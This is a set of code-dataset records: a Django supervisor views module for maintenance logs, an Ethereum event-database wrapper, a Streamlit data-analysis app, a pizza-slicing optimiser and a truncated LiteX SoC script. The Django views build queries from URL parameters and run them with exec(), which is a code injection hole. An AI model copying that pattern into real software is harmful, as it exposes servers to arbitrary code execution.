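# the record is timestamped and flagged PENDING (temp.save() follows just\n    # below) before send_mail() runs, so the approval state persists even if\n    # the mail fails to send.\n    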
print(\"temp\")\n # currdate = date.today()\n temp.save()\n \n print(temp)\n send_mail('urgent',mail,'aai.urgent@gmail.com',['naik.varun99@gmail.com'],fail_silently=False)\n # return render(request,'supervisor/imp_details.html',{'temp':temp[0],'names':names1,'logs':logs})\n return HttpResponseRedirect(reverse('supervisor:details',kwargs={'id':encode(request,str(pid)), 'name':names1}))\n # details(request,encode(request,str(pid)),names1)\ndef verify(request,names,id):\n \n ids=id\n id=decode(request,id)\n print(id)\n str1='temp=models.'\n str2='.objects.get(p_id='\n str3=')'\n names1=names.capitalize()\n \n que=str1+names1+str2+id+str3\n print(que)\n exec(que,globals())\n now = datetime.datetime.now()\n date=now.strftime(\"%Y-%m-%d\")\n time=now.strftime(\"%H:%M:%S\")\n temp.unit_incharge_approval='YES'\n temp.approval_date=date\n temp.approval_time=time\n temp.save()\n str1='context=[entry for entry in models.'\n str2='.objects.all().values()]'\n now = datetime.datetime.now()\n # names1=names.capitalize()\n # print('here')\n # print(names1)\n que=str1+names1+str2\n \n exec(que,globals())\n for i in context:\n i['token']=encode(request,str(i['p_id'])) \n if i['unit_incharge_approval']=='YES':\n i['flag']=1\n elif i['unit_incharge_approval']=='NO':\n i['flag']=0\n else:\n i['flag']='not set'\n # cdvordaily=[entry for entry in models.Cdvordaily.objects.all().values()]\n print(\"com\")\n # print(context)\n print(\"return\")\n # return HttpResponseRedirect(reverse('supervisor:details',args={'id':ids, 'name':names1}))\n # details(request,ids,names1)\n str1='temp=models.'\n str2='.objects.filter(p_id='\n str3=').values()'\n str4='.objects.all('\n que=str1+names1+str2+str(id)+str3\n exec(que,globals())\n str1='mrec=models.'\n que=str1+names1+str4+str3+\".order_by('-date')\"\n exec(que,globals())\n # UNCOMMENT WHEN DONE WITH ALL LOG TABLES\n logname=names1+'logs'\n logname=logname.replace('daily','d')\n logname=logname.replace('monthly','m')\n logname=logname.replace('weekly','w')\n logname=logname.replace('yearly','y')\n # print(logname)\n name=names1[0].lower()+names1[1:]\n # # logname=name+'logs'\n str1='logs=models.'\n str2='.objects.filter(p_id='\n str3=').values()'\n request.session['pid']=id\n request.session['name']=names\n que=str1+logname+str2+str(id)+str3+\".order_by('-log_id')\"\n exec(que,globals())\n # print(\"logs:\")\n # print(logs)\n i=temp[0]\n i['e_token']=encode(request,str(i['emp_id']))\n i['p_token']=encode(request,str(i['p_id']))\n eng=models.Engineer.objects.filter(emp_id=temp[0]['emp_id']).values()\n # print(i)\n redir='supervisor:'+name\n if name =='datisdaily':\n return render(request,'supervisor/imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec})\n elif name == 'datisweekly':\n \n return render(request,'supervisor/impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n elif name == 'dscndaily':\n \n return render(request,'supervisor/dscn_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'dscnmonthly':\n \n return render(request,'supervisor/dscn_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n elif name == 'cdvordaily':\n \n return render(request,'supervisor/cdvor_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'cdvormonthly':\n \n return 
render(request,'supervisor/cdvor_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n # return render(request,'supervisor/imp_details.html',{'temp':i,'names':name})\n elif name == 'cdvorweekly':\n \n return render(request,'supervisor/cdvor_impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'scctvdaily':\n \n return render(request,'supervisor/scctv_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'scctvmonthly':\n \n return render(request,'supervisor/scctv_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n # return render(request,'supervisor/imp_details.html',{'temp':i,'names':name})\n elif name == 'scctvweekly':\n \n return render(request,'supervisor/scctv_impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n\ndef empdetails(request,id):\n id=decode(request,id)\n \n uid=request.session['uid']\n eng=models.Engineer.objects.filter(emp_id=id).values() \n # datisweekly=[entry for entry in models.Datisweekly.objects.filter(emp_id=id).values().order_by('-date')]\n # datis=datisdaily+[i for i in datisweekly]\n # print(datis)\n # for i in datis:\n # # eng=models.Engineer.objects.filter(emp_id=i['emp_id']).values()\n \n \n # i.update({'type':'Datisdaily','token':encode(request,str(i['p_id']))})\n # print(i['e_name'])\n # print(datis)\n if request.session.get('dept')=='N':\n Cdvordaily=[entry for entry in models.Cdvordaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Cdvordaily:\n item.update( {\"type\":\"Cdvordaily\"})\n Cdvorweekly=[entry for entry in models.Cdvorweekly.objects.filter(emp_id=id).values().order_by('-date')]\n \n for item in Cdvorweekly:\n item.update( {\"type\":\"Cdvorweekly\"})\n \n\n \n Cdvormonthly=[entry for entry in models.Cdvormonthly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Cdvormonthly:\n item.update( {\"type\":\"Cdvormonthly\"}) \n \n \n com=Cdvordaily+[i for i in Cdvorweekly]+[i for i in Cdvormonthly]\n com=sorted(com,key=itemgetter('date'),reverse=True)\n \n eng=[entry for entry in models.Engineer.objects.filter(supervisor_id=uid).values()]\n for i in com:\n\n i.update({'token':encode(request,str(i['p_id']))})\n\n\n \n \n \n elif request.session.get('dept')=='C':\n datisdaily=[entry for entry in models.Datisdaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in datisdaily:\n item.update( {\"type\":\"Datisdaily\"})\n \n datisweekly=[entry for entry in models.Datisweekly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in datisweekly:\n item.update( {\"type\":\"Datisweekly\"})\n \n vhfdaily=[entry for entry in models.Vhfdaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in vhfdaily:\n item.update( {\"type\":\"Vhfdaily\"})\n \n \n # vhfweekly=[entry for entry in models.Vhfweekly.objects.filter(emp_id=id).values().order_by('-date')]\n # for item in vhfweekly:\n # item.update( {\"type\":\"Vhfweekly\"})\n vhfmonthly=[entry for entry in models.Vhfmonthly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in vhfmonthly:\n item.update( {\"type\":\"Vhfmonthly\"})\n \n dscndaily=[entry for entry in models.Dscndaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in dscndaily:\n item.update( {\"type\":\"Dscndaily\"})\n \n \n dscnweekly=[entry for entry in 
models.Dscnweekly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in dscnweekly:\n item.update( {\"type\":\"Dscnweekly\"})\n \n dscnmonthly=[entry for entry in models.Dscnmonthly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in dscnmonthly:\n item.update( {\"type\":\"Dscnmonthly\"})\n \n \n com=datisdaily+[i for i in datisweekly]+[i for i in dscnweekly]+[i for i in dscndaily]+[i for i in dscnmonthly]+[i for i in vhfdaily]+[i for i in vhfmonthly]\n com=sorted(com,key=itemgetter('date'),reverse=True)\n for i in com:\n\n i.update({'token':encode(request,str(i['p_id']))})\n\n \n elif request.session.get('dept')=='S':\n \n \n Scctvdaily=[entry for entry in models.Scctvdaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Scctvdaily:\n item.update( {\"type\":\"Scctvdaily\"})\n \n \n Scctvweekly=[entry for entry in models.Scctvweekly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Scctvweekly:\n item.update( {\"type\":\"Scctvweekly\"})\n \n Scctvmonthly=[entry for entry in models.Scctvmonthly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Scctvmonthly:\n item.update( {\"type\":\"Scctvmonthly\"})\n \n \n com=[i for i in Scctvweekly]+[i for i in Scctvdaily]+[i for i in Scctvmonthly]\n com=sorted(com,key=itemgetter('date'),reverse=True)\n for i in com:\n\n i.update({'token':encode(request,str(i['p_id']))})\n return render(request,'supervisor/employee_details.html',{'datis':com,'e_name':eng[0]['name'],'e_desig':eng[0]['designation'],'e_contact':eng[0]['contact'],'e_email':eng[0]['email']})\n\ndef encode(request,s):\n\n f=frt(request.session['key'].encode('utf-8'))\n token = f.encrypt(s.encode('utf-8'))\n # print(token.decode('utf-8'))\n return token.decode('utf-8')\n\ndef decode(request,s):\n f=frt(request.session['key'].encode('utf-8'))\n token = f.decrypt(s.encode('utf-8'))\n # print(token.decode('utf-8'))\n return token.decode('utf-8')\n\n","sub_path":"supervisor/views/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493220065","text":"\"\"\"provide access to the ethindex database\"\"\"\n\nimport collections\nimport itertools\nimport logging\nfrom typing import Any, Dict, List\n\nimport psycopg2\nimport psycopg2.extras\n\nfrom relay.blockchain import (\n currency_network_events,\n exchange_events,\n token_events,\n unw_eth_events,\n)\nfrom relay.blockchain.events import BlockchainEvent, TLNetworkEvent\nfrom relay.blockchain.proxy import sorted_events\n\n# proxy.get_all_events just asks for these network events. so we need the list\n# here.\n\n\nlogger = logging.getLogger(\"ethindex_db\")\n\n\ndef connect(dsn):\n return psycopg2.connect(dsn, cursor_factory=psycopg2.extras.RealDictCursor)\n\n\n# EventsQuery is used to store a where block together with required parameters\n# EthindexDB._run_events_query uses this to build and run a complete query.\nEventsQuery = collections.namedtuple(\"EventsQuery\", [\"where_block\", \"params\"])\n\n\nclass EventBuilder:\n \"\"\"Event Builder builds BlockchainEvents from web3 like events We use\n pretty much the same logic like relay.blockchain.Proxy (or its\n subclasses). The handling for timestamps is different. We also don't ask\n web3 for the currentBlock. 
It's passed in from the caller.\n\n So, this could be merged with the implementation in Proxy.\n \"\"\"\n\n def __init__(self, _event_builders: Dict[str, Any]) -> None:\n self.event_builders = _event_builders\n\n def build_events(\n self, events: List[Any], current_blocknumber: int\n ) -> List[BlockchainEvent]:\n return [self._build_event(event, current_blocknumber) for event in events]\n\n @property\n def event_types(self) -> List[str]:\n return list(self.event_builders.keys())\n\n def _build_event(self, event: Any, current_blocknumber: int) -> BlockchainEvent:\n event_type: str = event.get(\"event\")\n timestamp: int = event.get(\"timestamp\")\n return self.event_builders[event_type](event, current_blocknumber, timestamp)\n\n\n# we need to 'select * from events' all the time, but we're using lower-case\n# identifiers in postgres. The following select statement will give us a\n# dictionary with keys in the right case.\nselect_star_from_events = \"\"\"SELECT transactionHash \"transactionHash\",\n blockNumber \"blockNumber\",\n address,\n eventName \"event\",\n args,\n blockHash \"blockHash\",\n transactionIndex \"transactionIndex\",\n logIndex \"logIndex\",\n timestamp\n FROM events\n \"\"\"\n\norder_by_default_sort_order = \"\"\" ORDER BY blocknumber, transactionIndex, logIndex\n \"\"\"\n\n\nclass EthindexDB:\n \"\"\"EthIndexDB provides a partly compatible interface for the\n relay.blockchain.currency_network_proxy.CurrencyNetworkProxy,\n relay.blockchain.token_proxy.TokenProxy and\n relay.blockchain.unw_eth_proxy.UnwEthProxy classes\n\n We implement just enough to make it possible to use this as a drop-in\n replacement for relay.api.resources, that is, just the event reading.\n\n Since the proxy classes operates on one network address only,\n we allow to pass a default address in.\n \"\"\"\n\n def __init__(\n self, conn, standard_event_types, event_builders, from_to_types, address=None\n ):\n self.conn = conn\n self.default_address = address\n self.standard_event_types = standard_event_types\n self.event_builder = EventBuilder(event_builders)\n self.from_to_types = from_to_types\n\n @property\n def event_types(self):\n return self.event_builder.event_types\n\n def _build_events(self, rows):\n return self.event_builder.build_events(rows, self._get_current_blocknumber())\n\n def _get_current_blocknumber(self):\n with self.conn.cursor() as cur:\n cur.execute(\"\"\"select * from sync where syncid='default'\"\"\")\n row = cur.fetchone()\n if row:\n return row[\"last_block_number\"]\n else:\n raise RuntimeError(\"Could not determine current block number\")\n\n def _get_addr(self, address):\n \"\"\"all the methods here take an address argument\n At the moment we use the default address instead. 
Eventually callers will\n need to provide this argument, and we can remove the\n default_address.\n \"\"\"\n r = address or self.default_address\n assert r, \"no network address passed in and no default network address given\"\n return r\n\n def _get_standard_event_types(self, standard_event_types):\n r = standard_event_types or self.standard_event_types\n assert r, \"no standard event passed in and no default events given\"\n return r\n\n def _run_events_query(self, events_query: EventsQuery) -> List[BlockchainEvent]:\n \"\"\"run a query on the events table\"\"\"\n query_string = \"{select_star_from_events} WHERE {where_block} {order_by_default_sort_order}\".format(\n select_star_from_events=select_star_from_events,\n where_block=events_query.where_block,\n order_by_default_sort_order=order_by_default_sort_order,\n )\n\n with self.conn as conn:\n with conn.cursor() as cur:\n cur.execute(query_string, events_query.params)\n rows = cur.fetchall()\n return self._build_events(rows)\n\n def get_network_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n ) -> List[BlockchainEvent]:\n \"\"\"Function for compatibility with relay.blockchain.CurrencyNetworkProxy.\n Will be removed after a refactoring\n \"\"\"\n return self.get_user_events(event_name, user_address, from_block, timeout)\n\n def get_unw_eth_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n ) -> List[BlockchainEvent]:\n \"\"\"Function for compatibility with relay.blockchain.UnwEthProxy. Will be removed after a refactoring\"\"\"\n return self.get_user_events(event_name, user_address, from_block, timeout)\n\n def get_token_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n ) -> List[BlockchainEvent]:\n \"\"\"Function for compatibility with relay.blockchain.TokenProxy. Will be removed after a refactoring\"\"\"\n return self.get_user_events(event_name, user_address, from_block, timeout)\n\n def get_exchange_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n ) -> List[BlockchainEvent]:\n \"\"\"Function for compatibility with relay.blockchain.ExchangeProxy. 
Will be removed after a refactoring\"\"\"\n return self.get_user_events(event_name, user_address, from_block, timeout)\n\n def get_user_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n contract_address: str = None,\n ) -> List[BlockchainEvent]:\n contract_address = self._get_addr(contract_address)\n if user_address is None:\n return self.get_events(\n event_name,\n from_block=from_block,\n timeout=timeout,\n contract_address=contract_address,\n )\n query = EventsQuery(\n \"\"\"blockNumber>=%s\n AND eventName=%s\n AND address=%s\n AND (args->>'{_from}'=%s or args->>'{_to}'=%s)\n \"\"\".format(\n _from=self.from_to_types[event_name][0],\n _to=self.from_to_types[event_name][1],\n ),\n (from_block, event_name, contract_address, user_address, user_address),\n )\n\n events = self._run_events_query(query)\n\n logger.debug(\n \"get_user_events(%s, %s, %s, %s, %s) -> %s rows\",\n event_name,\n user_address,\n from_block,\n timeout,\n contract_address,\n len(events),\n )\n\n for event in events:\n if isinstance(event, TLNetworkEvent):\n event.user = user_address\n else:\n raise ValueError(\"Expected a TLNetworkEvent\")\n return events\n\n def get_all_unw_eth_events(\n self, user_address: str = None, from_block: int = 0, timeout: float = None\n ) -> List[BlockchainEvent]:\n return self.get_all_contract_events(\n unw_eth_events.standard_event_types, user_address, from_block, timeout\n )\n\n def get_all_token_events(\n self, user_address: str = None, from_block: int = 0, timeout: float = None\n ) -> List[BlockchainEvent]:\n return self.get_all_contract_events(\n token_events.standard_event_types, user_address, from_block, timeout\n )\n\n def get_all_network_events(\n self, user_address: str = None, from_block: int = 0, timeout: float = None\n ) -> List[BlockchainEvent]:\n return self.get_all_contract_events(\n currency_network_events.standard_event_types,\n user_address,\n from_block,\n timeout,\n )\n\n def get_all_exchange_events(\n self, user_address: str = None, from_block: int = 0, timeout: float = None\n ) -> List[BlockchainEvent]:\n return self.get_all_contract_events(\n exchange_events.standard_event_types, user_address, from_block, timeout\n )\n\n def get_all_contract_events(\n self,\n event_types: List[str],\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n contract_address: str = None,\n ) -> List[BlockchainEvent]:\n # XXX The following code should be replaced with a proper SQL query.\n # The reason it isn't already a SQL query, is that we need to\n # dynamically create that query.\n contract_address = self._get_addr(contract_address)\n results = [\n self.get_user_events(\n event_type,\n user_address=user_address,\n from_block=from_block,\n timeout=timeout,\n contract_address=contract_address,\n )\n for event_type in event_types\n ]\n return sorted_events(list(itertools.chain.from_iterable(results)))\n\n def get_events(\n self,\n event_name,\n from_block=0,\n timeout: float = None,\n contract_address: str = None,\n ) -> List[BlockchainEvent]:\n contract_address = self._get_addr(contract_address)\n query = EventsQuery(\n \"\"\"blockNumber>=%s\n AND eventName=%s\n AND address=%s\"\"\",\n (from_block, event_name, contract_address),\n )\n events = self._run_events_query(query)\n\n logger.debug(\n \"get_events(%s, %s, %s, %s) -> %s rows\",\n event_name,\n from_block,\n timeout,\n contract_address,\n len(events),\n )\n\n return events\n\n def get_all_events(\n self,\n from_block: int = 0,\n timeout: float = 
None,\n contract_address: str = None,\n standard_event_types=None,\n ) -> List[BlockchainEvent]:\n contract_address = self._get_addr(contract_address)\n standard_event_types = self._get_standard_event_types(standard_event_types)\n query = EventsQuery(\n \"\"\"blockNumber>=%s\n AND address=%s\n AND eventName in %s\"\"\",\n (from_block, contract_address, tuple(standard_event_types)),\n )\n\n events = self._run_events_query(query)\n logger.debug(\n \"get_all_events(%s, %s, %s) -> %s rows\",\n from_block,\n timeout,\n contract_address,\n len(events),\n )\n\n return events\n","sub_path":"relay/ethindex_db.py","file_name":"ethindex_db.py","file_ext":"py","file_size_in_byte":11941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"170963116","text":"import numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nfrom pandas_profiling import ProfileReport\r\nfrom streamlit_pandas_profiling import st_profile_report\r\n\r\ndef main():\r\n html_temp1 = \"\"\"<div style=\"background-color:#6D7B8D;padding:10px\">\r\n \t\t<h4 style=\"color:white;text-align:center;\">Exploratory data Analysis Application</h4>\r\n \t\t</div>\r\n \t\t<div>\r\n \t\t</br>\"\"\"\r\n st.markdown(html_temp1, unsafe_allow_html=True)\r\n\r\n menu = [\"Home\", \"EDA\", \"About\"]\r\n choice = st.sidebar.selectbox(\"Menu\", menu, 2)\r\n # for hide menu\r\n hide_streamlit_style = \"\"\"\r\n <style>\r\n #MainMenu {visibility: hidden;}\r\n footer {visibility: hidden;}\r\n </style>\r\n \"\"\"\r\n st.markdown(hide_streamlit_style, unsafe_allow_html=True)\r\n\r\n st.sidebar.markdown(\r\n \"\"\" Developed by Mohammad Juned Khan \r\n Email : Mohammad.juned.z.khan@gmail.com \r\n [LinkedIn] (https://www.linkedin.com/in/md-juned-khan)\"\"\")\r\n if choice == \"Home\":\r\n # color codes ff1a75 6D7B8D\r\n html_temp2 = \"\"\"<div style=\"background-color:#6D7B8D;padding:10px\">\r\n \t\t<h4 style=\"color:white;text-align:center;\">This is the Exploratory data Analysis Application created using Streamlit framework and pandas-profiling library.</h4>\r\n \t\t</div>\r\n \t\t<div>\r\n \t\t</br>\"\"\"\r\n st.markdown(html_temp2, unsafe_allow_html=True)\r\n\r\n elif choice == \"EDA\":\r\n html_temp3 = \"\"\"\r\n \t\t<div style=\"background-color:#98AFC7;padding:10px\">\r\n \t\t<h4 style=\"color:white;text-align:center;\">Upload file Your file in csv formate and perform Exploratory Data Analysis</h4>\r\n \t\t<h5 style=\"color:white;text-align:center;\">Make sure your columns have correct data types before uploading.</h5>\r\n \t\t</div>\r\n \t\t<br></br>\"\"\"\r\n\r\n st.markdown(html_temp3, unsafe_allow_html=True)\r\n st.subheader(\"Perform Exploratory data Analysis with Pandas Profiling Library\")\r\n data_file= st.file_uploader(\"Upload a csv file\", type=[\"csv\"])\r\n if st.button(\"Analyze\"):\r\n if data_file is not None:\r\n # Pandas Profiling Report\r\n @st.cache\r\n def load_csv():\r\n csv = pd.read_csv(data_file)\r\n return csv\r\n\r\n df = load_csv()\r\n pr = ProfileReport(df, explorative=True)\r\n st.header('*User Input DataFrame*')\r\n st.write(df)\r\n st.write('---')\r\n st.header('*Exploratory Data Analysis Report Using Pandas Profiling*')\r\n st_profile_report(pr)\r\n else:\r\n st.success(\"Upload file\")\r\n else:\r\n pass\r\n # st.write(\"Check similarity of Resume and Job Description\")\r\n elif choice == \"About\":\r\n html_temp4 = \"\"\"\r\n \t\t<div style=\"background-color:#98AFC7;padding:10px\">\r\n \t\t<h4 style=\"color:white;text-align:center;\">This Application is 
developed by Mohammad Juned Khan using Streamlit Framework. If you're on LinkedIn and want to connect, just click on the link in sidebar and shoot me a request. You can also mail your comments. </h4>\r\n \t\t<h4 style=\"color:white;text-align:center;\">Thanks for Visiting</h4>\r\n\r\n \t\t</div>\r\n \t\t<br></br>\r\n \t\t<br></br>\"\"\"\r\n\r\n st.markdown(html_temp4, unsafe_allow_html=True)\r\n else:\r\n pass\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"EDA_APP.py","file_name":"EDA_APP.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"148890667","text":"import os\nimport numpy as np\nimport itertools\nimport pickle\nimport random\nimport math\nimport scipy.optimize\n\nR = 180\nC = 60\nH = 3\nA = 12\n\ndef get_hams (M,a):\n return np.sum(M[a[0][0]:a[0][1],a[1][0]:a[1][1]])\n\ndef get_area (a):\n assert(a[0][1]>=a[0][0])\n assert(a[1][1]>=a[1][0])\n return (a[0][1]-a[0][0]+1)*(a[1][1]-a[1][0]+1)\n\ndef cut_is_valid (P,a):\n if np.sum(P[a[0][0]:a[0][1]+1,a[1][0]:a[1][1]+1]) > 0:\n return False\n else:\n return True\n\ndef update_map (P,a,v=1):\n P[a[0][0]:a[0][1]+1,a[1][0]:a[1][1]+1]=v\n return P\n\ndef comp_score (M,cuts):\n score = 0\n for c in cuts:\n v = get_area(c)\n h = get_hams(M,c)\n assert(v<=A)\n assert(v>=H)\n score += v\n return score\n\ndef get_fill_rate (cuts):\n P = np.zeros((R,C))\n for a in cuts:\n P = update_map(P,a)\n\n return np.sum(P) / (R*C)\n\ndef draw_cuts (cuts):\n P = np.zeros((R,C))\n for a in cuts:\n P = update_map(P,a)\n\n for r in range(R):\n str = ''\n for c in range(C):\n str += '%d' % P[r,c]\n print(str)\n\ndef grid_cuts(M):\n cuts = []\n rl = np.arange(0,R,3)\n rr = rl+2\n rz = list(zip(rl,rr))\n cl = np.arange(0,C,4)\n cr = cl+3\n cz = list(zip(cl,cr))\n xz = itertools.product(rz,cz)\n for c in xz:\n if get_hams(M,c) >= H:\n cuts.append(c)\n return cuts\n\ndef list_fmts (M):\n fmts = []\n for c in range(1,12):\n for r in range(1,12):\n if c*r >= 3 and c*r <= A:\n fmts.append((r,c))\n fmts = list(set(fmts))\n for fmt in fmts:\n assert(fmt[0]*fmt[1]<=A)\n return fmts\n\ndef is_in (a,b):\n return (a[0][0]>=b[0][0]) and (a[0][0]<=b[0][1]) and \\\n (a[0][1]>=b[0][0]) and (a[0][1]<=b[0][1]) and \\\n (a[1][0]>=b[1][0]) and (a[1][0]<=b[1][1]) and \\\n (a[1][1]>=b[1][0]) and (a[1][1]<=b[1][1])\n\ndef list_good_cuts (M,fmts):\n if os.path.isfile('gcuts.bin'):\n return pickle.load(open('gcuts.bin','rb'))\n\n cuts = []\n for fmt in fmts:\n for c in range(C):\n for r in range(R):\n #print('%d %d %d x %d' % (c,r,fmt[0],fmt[1]))\n a = ((r,r+fmt[0]-1),(c,c+fmt[1]-1))\n assert(get_area(a)<=A)\n if is_in (a,((0,R-1),(0,C-1))) and get_hams(M,a)>=3:\n cuts.append(a)\n pickle.dump(cuts,open('gcuts.bin','wb'))\n return(cuts)\n\ndef sigmoid(x):\n return 1 / (1+math.exp(-x))\n\ndef check_cuts (cuts):\n for a in cuts:\n area_a = get_area(a)\n if area_a>A:\n print(a)\n print(area_a)\n assert(area_a<=A)\n\ndef init_solution (M, g_cuts):\n\n best_score = 0\n best_cuts = None\n best_idx = None\n for r in range(10):\n\n ng = len(g_cuts)\n is_kept = np.zeros(ng)\n P = np.zeros(M.shape)\n score = 0\n\n for k in range(100000):\n i = random.randint(0,ng-1)\n a = g_cuts[i]\n area_a = get_area(a)\n assert(area_a)<=A\n\n if is_kept[i] == 0:\n if cut_is_valid (P,a):\n P = update_map(P,a)\n score += area_a\n assert(score == np.sum(P))\n is_kept[i] = 1\n #print(score)\n\n elif is_kept[i] == 1:\n # remove at random\n thresh = .9#15*(1-sigmoid(math.log(math.log(k)))*(12/area_a))\n 
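# with thresh fixed at 0.9, each kept cut is evicted with probability 0.1,\n                # letting the random search escape locally packed but globally poor\n                # layouts; the commented-out expression above is an abandoned\n                # annealing-style schedule.\n                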
#print(thresh)\n if random.random() > thresh:\n is_kept[i] = 0\n score -= area_a\n P = update_map(P,a,0)\n assert(score == np.sum(P))\n #print(score)\n\n if score>best_score:\n best_score=score\n best_idx = np.nonzero(is_kept==1)[0].astype(int)\n best_cuts = []\n for j in range(ng):\n if is_kept[j]==1:\n best_cuts.append(g_cuts[j])\n print(best_score)\n print('Initial score : %d' % best_score)\n print('Check : %d/%d' % (comp_score(M,best_cuts),np.sum(P)))\n return (best_cuts,best_idx)\n\ndef read_data (in_file):\n with open(in_file,'r') as fp:\n d = fp.readline().split(' ')\n vs = []\n for x in fp.readlines():\n v = x.strip().replace('H','1').replace('T','0')\n v = list(map(int,v))\n vs.append(v)\n M = np.vstack(tuple(vs))\n print(M)\n return M\n\ndef optimize_cuts (M, good_cuts, init_cuts, init_cuts_idx):\n\n # init map\n P = np.zeros(M.shape)\n for i in init_cuts_idx:\n a = good_cuts[i]\n assert(cut_is_valid(P,a))\n P = update_map(P,a)\n\n assert(len(init_cuts)==len(init_cuts_idx))\n score = np.sum(P)\n print('Initial score : %d (%d cuts)' % (score,len(init_cuts_idx)))\n print('Check : %d' % comp_score(M,init_cuts))\n cuts_idx = init_cuts_idx.copy()\n\n # fix rectangles\n for k in range(10):\n\n # select a rectangle at random\n r1 = random.randint(0,R-30)\n c1 = random.randint(0,C-30)\n z = ((r1,r1+30),(c1,c1+30))\n\n # remove all cuts inside Z\n tmp_cuts_idx = []\n for i in cuts_idx:\n a = good_cuts[i]\n if not is_in(a,z):\n tmp_cuts_idx.append(i)\n else:\n P = update_map(P,a,0)\n cuts_idx = tmp_cuts_idx\n #print('%d cuts left after removal. New score : %d' % (len(cuts_idx),np.sum(P)))\n\n # list candidate cuts\n candidate_cuts = []\n candidate_idx = []\n for (ca_c,a) in zip(range(len(good_cuts)),good_cuts):\n if is_in(a,z) and cut_is_valid(P,a):\n candidate_cuts.append(a)\n candidate_idx.append(ca_c)\n n_candidates = len(candidate_cuts)\n\n W = np.zeros((get_area(z),n_candidates))\n W_row=0\n for r in range(z[0][0],z[0][1]+1):\n for c in range(z[1][0],z[1][1]+1):\n for (ca_c,ca) in zip(range(n_candidates),candidate_cuts):\n if is_in(((r,r),(c,c)),ca):\n W[W_row,ca_c] = 1\n W_row += 1\n Q = np.zeros(W.shape[0])+1\n Z = np.array([get_area(a) for a in candidate_cuts])\n\n # solve min(-Z'x) with W.x <= Q\n #print('Solving for %d candidates...' 
% n_candidates)\n res = scipy.optimize.linprog(-Z,W,Q,None,None,(0,1),'simplex',None,None)\n if not res.success:\n continue\n resx = np.round(res.x)\n assert((W.dot(resx)<=Q).all())\n for (x_c,s) in zip(range(resx.size),resx):\n if s == 1:\n a = good_cuts[candidate_idx[x_c]]\n assert(cut_is_valid(P,a))\n P = update_map(P,a)\n cuts_idx.append(candidate_idx[x_c])\n score = np.sum(P)\n cuts = []\n for i in cuts_idx:\n cuts.append(good_cuts[i])\n print('%d(%d),%s' % (int(score),comp_score(M,cuts),get_fill_rate(cuts)))\n return cuts\n\ndef main():\n\n random.seed(123456)\n\n M = read_data ('test_round.in')\n\n cuts = grid_cuts(M)\n grid_score = comp_score(M,cuts)\n print(grid_score)\n\n # list good cuts\n good_cuts = list_good_cuts(M,list_fmts(M))\n print('%d possible cuts' % len(good_cuts))\n\n # check\n check_cuts(good_cuts)\n\n # find init solution\n (init_cuts,init_cuts_idx) = init_solution (M, good_cuts)\n\n # optimize cuts\n opt_cuts = optimize_cuts (M,good_cuts,init_cuts,init_cuts_idx)\n\n # draw cuts\n draw_cuts (opt_cuts)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"practice/pizza/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"644031701","text":"#!/usr/bin/env python3\n\nfrom migen import *\n\nfrom litex.soc.integration.soc_core import *\nfrom litex.soc.integration.builder import *\nfrom litex.soc.cores.clock import *\n\nfrom liteeth.phy.ecp5rgmii import LiteEthPHYRGMII\nfrom liteeth.core import LiteEthUDPIPCore\nfrom liteeth.frontend.etherbone import LiteEthEtherbone\n\nfrom litex_boards.platforms import colorlight_5a_75b\n\n# CRG ----------------------------------------------------------------------------------------------\n\nclass _CRG(Module):\n def __init__(self, platform, sys_clk_freq):\n self.clock_domains.cd_sys = ClockDomain()\n self.clock_domains.cd_sys_ps = ClockDomain()\n\n # # #\n\n clk25 = platform.request(\"clk25\")\n platform.add_period_constraint(clk25, 1e9/25e6)\n\n self.submodules.pll = pll = ECP5PLL()\n pll.register_clkin(clk25, 25e6)\n 